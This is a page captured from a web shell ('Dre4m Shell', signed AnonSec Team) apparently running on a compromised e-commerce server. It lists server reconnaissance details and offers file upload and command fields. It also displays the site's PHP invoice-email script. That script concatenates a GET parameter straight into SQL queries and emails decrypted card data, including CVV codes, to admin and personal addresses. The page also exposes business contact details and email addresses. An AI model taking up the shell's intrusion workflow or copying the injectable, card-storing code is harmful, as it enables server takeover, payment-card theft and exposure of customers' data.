Dre4m Shell
Server IP : 127.0.0.2  /  Your IP : 18.216.95.250
Web Server : Apache/2.4.18 (Ubuntu)
System :
User : www-data ( )
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : disk_free_space,disk_total_space,diskfreespace,dl,exec,fpaththru,getmyuid,getmypid,highlight_file,ignore_user_abord,leak,listen,link,opcache_get_configuration,opcache_get_status,passthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,php_uname,phpinfo,posix_ctermid,posix_getcwd,posix_getegid,posix_geteuid,posix_getgid,posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid,posix,_getppid,posix_getpwnam,posix_getpwuid,posix_getrlimit,posix_getsid,posix_getuid,posix_isatty,posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid,posix_setpgid,posix_setsid,posix_setuid,posix_times,posix_ttyname,posix_uname,pclose,popen,proc_open,proc_close,proc_get_status,proc_nice,proc_terminate,shell_exec,source,show_source,system,virtual
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /var/www/html/admin/invoice-details_email.php
<?php
session_start();
require_once('include/db-config.php');
require_once('include/skey.php');
/*<style type="text/css">
body, table, tr, td
{
	font-family:Arial, Helvetica, sans-serif;
	font-size:13px; color:#000000;
}
</style>*/ 
$CardNumber = "";
$ID = "";
$emaito = "";
$subject = "";
if(isset($_GET['id']))
{
	$ID = $_GET['id'];
}
else
{
	$ID = $_SESSION['InvoiceNo'];
}
$sql="select tb1.CouponCode, tb1.DiscountType, tb1.CouponAmount, tb1.OrderDate, tb2.Billing_FirstName, tb2.Billing_LastName, tb2.Billing_Address1, tb2.Billing_Address2, tb2.Billing_City, tb2.Billing_State, tb2.Billing_Country, tb2.Billing_Zip, tb2.Billing_EmailID, tb2.Shipping_FirstName, tb2.Shipping_LastName, tb2.Shipping_Address1, tb2.Shipping_Address2, tb2.Shipping_City, tb2.Shipping_State, tb2.Shipping_Country, tb2.Shipping_Zip, tb2.Shipping_EmailID, tb1.OrderStatus, tb1.ShippingStatus, tb1.AdminComment, tb1.PaymentStatus, tb1.ShippingDetailsCustomer, tb1.NotesToCustomer, tb1.InvoiceSent2Customer from maintrainer_tbl_cart_master tb1 left join maintrainer_tbl_customer_information tb2 on tb2.CartMasterID = tb1.ID where tb1.ID=".$ID;	
$result=mysqli_query($conn,$sql);
$row=mysqli_fetch_array($result);
$DiscountType =$row['DiscountType'];
$Discount =$row['CouponAmount'];
$OrderDate = date('M-d-Y', strtotime($row['OrderDate']));
$Billing_FirstName = $row['Billing_FirstName'];
$Billing_LastName = $row['Billing_LastName'];
$Billing_Address1 = $row['Billing_Address1'];
$Billing_Address2 = $row['Billing_Address2']; 
$Billing_City = $row['Billing_City'];
$Billing_State = $row['Billing_State'];
$Billing_Country = $row['Billing_Country'];
$Billing_Zip = $row['Billing_Zip'];
$Billing_EmailID = $row['Billing_EmailID'];
$Shipping_FirstName = $row['Shipping_FirstName'];
$Shipping_LastName = $row['Shipping_LastName'];
$Shipping_Address1 = $row['Shipping_Address1'];
$Shipping_Address2 = $row['Shipping_Address2'];
$Shipping_City = $row['Shipping_City'];
$Shipping_State = $row['Shipping_State'];
$Shipping_Country = $row['Shipping_Country'];
$Shipping_Zip = $row['Shipping_Zip'];
$Shipping_EmailID = $row['Shipping_EmailID'];
$ShippingStatus_lbl = "";
$ShippingStatus = $row['ShippingStatus'];
if($ShippingStatus == 1)
	$ShippingStatus_lbl = "Incomplete";
else if($ShippingStatus == 2)
	$ShippingStatus_lbl = "Pending";
else if($ShippingStatus == 3)
	$ShippingStatus_lbl = "Processing";
else if($ShippingStatus == 4)
	$ShippingStatus_lbl = "Processed";
else if($ShippingStatus == 5)
	$ShippingStatus_lbl = "Shipping";
else if($ShippingStatus == 6)
	$ShippingStatus_lbl = "Shipped";
else if($ShippingStatus == 7)
	$ShippingStatus_lbl = "Partially Shipped";
else if($ShippingStatus == 8)
	$ShippingStatus_lbl = "Return";
else if($ShippingStatus == 9)
	$ShippingStatus_lbl = "Partially Returned";
else if($ShippingStatus == 10)
	$ShippingStatus_lbl = "Will Not Deliver";
else if($ShippingStatus == 11)
	$ShippingStatus_lbl = "Delivered";
else if($ShippingStatus == 12)
	$ShippingStatus_lbl = "Cancelled";
$PaymentStatus_lbl = "";
$PaymentStatus = $row['PaymentStatus'];
if($PaymentStatus == 1)
	$PaymentStatus_lbl = "Incomplete";
else if($PaymentStatus == 2)
	$PaymentStatus_lbl = "Pending";
else if($PaymentStatus == 3)
	$PaymentStatus_lbl = "Processing";
else if($PaymentStatus == 4)
	$PaymentStatus_lbl = "Processed";
else if($PaymentStatus == 5)
	$PaymentStatus_lbl = "Will not Settle";
else if($PaymentStatus == 6)
	$PaymentStatus_lbl = "Rejected";
else if($PaymentStatus == 7)
	$PaymentStatus_lbl = "Returned";
else if($PaymentStatus == 8)
	$PaymentStatus_lbl = "Completed";
$AdminComment = $row['AdminComment'];
$ShippingDetailsCustomer = $row['ShippingDetailsCustomer'];
$NotesToCustomer = $row['NotesToCustomer'];
$InvoiceSent2Customer = $row['InvoiceSent2Customer'];
if(isset($_GET['id']))
{
	$emaito = "customer";	
	$subject = "Invoice Details - Springfield Resources, Invoice No. ".$ID;
	$to = $Billing_EmailID;
}
else
{
	$emaito = "admin";
	$subject = "New Invoice Received :: maintenancetraining.com - Invoice No. ".$ID.", Customer Name: ".$Billing_FirstName." ".$Billing_LastName;
	//$to = "JDL@maintrainer.com";
	$to="JDL@maintrainer.com, afsalnishad@gmail.com";
}
$email_msg = '
<TABLE WIDTH=800 BORDER=0 CELLPADDING=0 CELLSPACING=0 align="left">
	<tr>
    	<td colspan="2" align="center"><img src="http://www.maintenancetraining.com/admin/images/invoiceheader.gif" border="0" ></td>
	</tr>
    <tr><td style="height:10px;"></td></tr>
    <tr>
    	<td align="left">
            <strong>Springfield Resources</strong>
            <br>
            205 Ash Lane,Lafayette Hill PA, 19444-2101
            <br>Phone: 610-397-1006
            <br>Fax: 610-397-1007
            <br>Toll Free: 800-242-5656
            <br><font color="#000000">Email: jdl@maintrainer.com</font>
            <br><font color="#000000">URL: http://www.maintenancetraining.com</font>
		</td>
	</tr>
    <tr>
		<td colspan="2" align="center"><h2><b>INVOICE DETAILS</b></h2></td>
	</tr>
	<tr>
		<td width="50%" align="left">
		<strong>Date: '.$OrderDate.'</strong>
	</td>
	<td width="50%" align="right">
		<strong>Inv No. '.$ID.'</strong>
	</td>
	<tr><td colspan="2" style="height:20px;"></td></tr>
	<tr>
		<td width="50%" align="left">
			<b>Billing Address</b>
			<br>
			'.$Billing_FirstName.' '.$Billing_LastName.'<br>'.$Billing_Address1.'<br>';
			if($Billing_Address2!="")
			{
			 	$email_msg = $email_msg . $Billing_Address2.'<br>';
			}
			$email_msg = $email_msg.$Billing_City.', '.$Billing_State.'<br>'.$Billing_Country.' - '.$Billing_Zip . '<br><font color="#000000">Email ID: '.$Billing_EmailID.'</font>
		</td>
		<td width="50%" align="right">
			<b>Shipping Address</b>
			<br>
			'.$Shipping_FirstName.' '.$Shipping_LastName.'<br>'.$Shipping_Address1.'<br>';
			if($Shipping_Address2!="")
			{
				$email_msg = $email_msg . $Shipping_Address2.'<br>';
			}
			$email_msg = $email_msg.$Shipping_City.', '.$Shipping_State.'<br>'.$Shipping_Country.' - '.$Shipping_Zip.'<br><font color="#000000">Email ID: '.$Shipping_EmailID.'</font>
		</td>
	</tr>
	</tr>
	<TR>
		<TD COLSPAN=2 WIDTH="100%" valign="top">
			<TABLE WIDTH=100% BORDER=0 CELLPADDING=0 CELLSPACING=0 height="100%" align="center">
                <tr>
					<td height="100%" valign="top" align="center" style="padding-top:20px; padding-bottom:10px;">
						<b>CART ITEMS</b>
					</td>
				</tr>
				<TR>
                    <td width="100%" valign="top">
						<table cellpadding="10" cellspacing="1"  align="left" width="100%" border="0" bgcolor="#999999">
							<tr>
								<td bgcolor="#999999"><b>Sl No</b></td>
								<td bgcolor="#999999"><b>Product Category</b></td>
								<td bgcolor="#999999"><b>Product Name</b></td>
                               	<td align="right" bgcolor="#999999"><b>Qty</b></td>
								<td align="right" bgcolor="#999999"><b>Price</b></td>
							</tr>';
							$i=1;
							$tot=0;
							//$sql1="select ProductCategory,ProductName,ProductQty,DiscountPercentage,ProductPrice from maintrainer_tbl_cart_details where CartMasterID=".$ID;
							$sql1="SELECT tb1.ProductCategory,tb1.ProductName,tb1.ProductQty,tb1.DiscountPercentage,tb1.ProductPrice,tb1.product_key,tb2.DownloadURL,tb2.DownloadFlag  FROM maintrainer_tbl_cart_details AS tb1 left outer join productnew AS tb2 ON tb1.Product_ID=tb2.ID WHERE tb1.CartMasterID=".$ID;
							$result1=mysqli_query($conn,$sql1);
							while($row1= mysqli_fetch_array($result1))
							{
							$email_msg = $email_msg.'
							<tr>
								<td bgcolor="#FFFFFF">'.$i++.'</td>
								<td bgcolor="#FFFFFF">'.$row1['ProductCategory'].'</td>
								<td bgcolor="#FFFFFF">'.$row1['ProductName'].'<br>';
								if($row1['DiscountPercentage']!=0)
								{
									$email_msg = $email_msg.'Volume Discount: '.$row1['DiscountPercentage'].'%Off'.'<br>';
								}
								if(($row1['DownloadFlag']==1) and ($row1['DownloadURL']!=""))
								{
									$email_msg = $email_msg.'Download Link:<font color="#FFFFFF"><a href="'.$row1['DownloadURL'].'" target="_blank">'.$row1['DownloadURL'].'</a></font>'.'<br>';
								}
								if($row1['product_key']!="")
								{
									$email_msg = $email_msg.'Product Key: '.$row1['product_key'].'<br>';
								}
								$email_msg = $email_msg.'</td>                               
								<td bgcolor="#FFFFFF" align="right">'.$row1['ProductQty'].'</td>                                
								<td bgcolor="#FFFFFF" align="right">'.$row1['ProductPrice'].'</td>
							</tr>';
							$tot=$row1['ProductPrice']+$tot;						 
							}
							$sql2="select ShippingPrice,TotalProductPrice from maintrainer_tbl_cart_payment where CartMasterID=".$ID;
							$result2=mysqli_query($conn,$sql2);
							$row2=mysqli_fetch_array($result2) or die(mysqli_error());							
							$ShippingPrice=$row2['ShippingPrice'];
							$TotalProductPrice=$row2['TotalProductPrice'];
							if($DiscountType=="Amount")
							{
								$coupondics=$Discount;
							}
							else
							{
								$coupondics=($tot*$Discount)/100;
							}
							if(isset($DiscountType) && $row['CouponCode']!="")
							{
							$email_msg = $email_msg.'
								<tr>
									<td bgcolor="#FFFFFF" colspan="4"><b>Coupon Discount';
									if($DiscountType!="Amount") 
									$email_msg = $email_msg.'('.number_format($Discount,0).'%)</b><BR>
									Coupon code: '.$row['CouponCode'].'
									</td>
									<td bgcolor="#FFFFFF" colspan="1" align="right">';
									if($DiscountType=="Amount")
									{
										$email_msg = $email_msg.'<b>$'.$Discount.'</b>';
									}
									else
									{
										$email_msg = $email_msg.'<b>$'. number_format($coupondics,2).'</b>';
									}
									$email_msg = $email_msg.'
									</td>								 
								</tr>';
							}
							$email_msg = $email_msg.'
							 <tr>
								<td bgcolor="#FFFFFF" colspan="4"><b>Shipping Charge</b></td>
								<td bgcolor="#FFFFFF" colspan="1" align="right"><b>$'. number_format($ShippingPrice,2).'</b></td>								
							</tr>
                                
                             <tr>
								<td bgcolor="#FFFFFF" colspan="4"><b>Total</b></td>
								<td bgcolor="#FFFFFF" colspan="1" align="right"><b>$'. $TotalProductPrice.'</b></td>								
							</tr>							
						</table>
					</td>
                </TR>
            </TABLE>
        </TD>
	</TR>';
	    //$sql3="select  CardName, CardNumber, CardType, CardCVVNumber, CardExpYear, CardExpMonth, PayType, PoNumber, PoDetails, CheckNumber, CheckDetails from maintrainer_tbl_cart_cerditcard_details where CartMasterId=".$ID;
		$sql3="SELECT  tb1.CardName,tb1.CardNumber,tb1.CardType,tb1.CardCVVNumber,tb1.CardExpYear,tb1.CardExpMonth,tb1.PayType,tb1.PoNumber,tb1.PoDetails,tb1.CheckNumber,tb1.CheckDetails,tb2.TransactionID FROM maintrainer_tbl_cart_cerditcard_details AS tb1 LEFT OUTER JOIN maintrainer_tbl_cart_master AS tb2 ON tb1.CartMasterID=tb2.ID WHERE tb1.CartMasterID=".$ID;
		$result3=mysqli_query($conn,$sql3);
		$row3=mysqli_fetch_array($result3);
		if($row3['PayType']=="chk")
		{
		   $paytype="Check";
		}
		else if($row3['PayType']=="po")
		{
			$paytype="PO";
		}
		else if($row3['PayType']=="paypal")
		{
		   $paytype="Pay Pal";
		}
		else
		{
		   $paytype="Credit Card";	
		   $CardNumber = convert($row3['CardNumber'],$key);
		}
	$email_msg = $email_msg.'
	<tr><td colspan="2" style="height:20px;"></td></tr>
	<tr>
		<td width="100%" align="left" colspan="2">
			<b>Payment Details</b>
            <br>
            Payment Type: '.$paytype;
			if($row3['PayType']=="chk")
			{
				$email_msg = $email_msg.'
				<br>
				Check Number: '.$row3['CheckNumber'].'
				<br>
				Check Details: '.nl2br($row3['CheckDetails']);
			}
			else if($row3['PayType']=="po")
			{
				$email_msg = $email_msg.'
				<br>
				Po Number: '.$row3['PoNumber'].'
				<br>
				Po Details: '.nl2br($row3['PoDetails']);
			}
			else if($row3['PayType']=="paypal")
			{
				$email_msg = $email_msg.'
				<br>
				Transaction ID: '.$row3['TransactionID'];
			}
			else
			{
				$email_msg = $email_msg.'
				<br>Card Holder Name: '.$row3['CardName'].'
				<br>Card No: 
				<label id="cardno">XXXX XXXX XXXX '.substr($CardNumber,12,4).'</label>';
				if($emaito == "admin")
				{
					$email_msg = $email_msg.'
					<br>
					Card Type: '.$row3['CardType'].'
					<br>
					CVV No. '.$row3['CardCVVNumber'].'
					<br>Card Expiry: '.$row3['CardExpMonth'].' '.$row3['CardExpYear'];
				}
			}
			$email_msg = $email_msg.'
		</td>
	</tr>';
	if($emaito == "customer")
	{
	$email_msg = $email_msg.'
		<tr>
			<TD COLSPAN=2 WIDTH="100%" valign="top">
				<br>
				<b>Shipping Status</b>: '.$ShippingStatus_lbl.'
				<br>
				<b>Payment Status</b>: '.$PaymentStatus_lbl.'
				<br><br>
				<b>Shipping Details</b>:<br>'.nl2br($ShippingDetailsCustomer).'
				<br><br>
				<b>Other Notes</b>:<br>'.nl2br($NotesToCustomer).'
			</td>
		</tr>';
	}
	$email_msg = $email_msg.'
    <Tr><td height="50"></td></Tr>
</TABLE>';
$from = "JDL@maintrainer.com"; 
//$from = "bijibhaskaran15@gmail.com"; 
$headers = "From: ".$from."\r\n";
$headers .= "Reply-To: ".$from."\r\n";
$headers .= "Return-Path: ".$from."\r\n";
$headers .= "MIME-Version: 1.0\r\n";
$headers .= "Content-Type: text/html; charset=ISO-8859-1\r\n";
$message = $email_msg;


/* Updated by Afsal Nishad for sending invoice email to both customr and admin. */
/* On Tuesday 06, Nov 2012 */
// Assuming this will execute only through admin panel as admin executing the url through admin panel by passing GET['id']
if(isset($_GET['id']))
{
	$subject = "Invoice Details - Springfield Resources, Invoice No. ".$ID;
	$to = $Billing_EmailID;
	mail($to, $subject, $message, $headers);
}
else
{
	$subject = "New Invoice Received :: maintenancetraining.com - Invoice No. ".$ID.", Customer Name: ".$Billing_FirstName." ".$Billing_LastName;
	//$to = "JDL@maintrainer.com";
	$to="afsalnishad@gmail.com";
	mail($to, $subject, $message, $headers);
	
	$subject = "Invoice Details - Springfield Resources, Invoice No. ".$ID;
	$to = $Billing_EmailID;
	mail($to, $subject, $message, $headers);
}

$sql_e = "update maintrainer_tbl_cart_master set InvoiceSent2Customer = 1 where ID = ".$ID;
$result_e=mysqli_query($conn,$sql_e);

if($emaito == "customer")
{
	$url = "Location: invoice-mgt.php?r=3";
	header($url);
	exit;
}
?>

Anon7 - 2022
AnonSec Team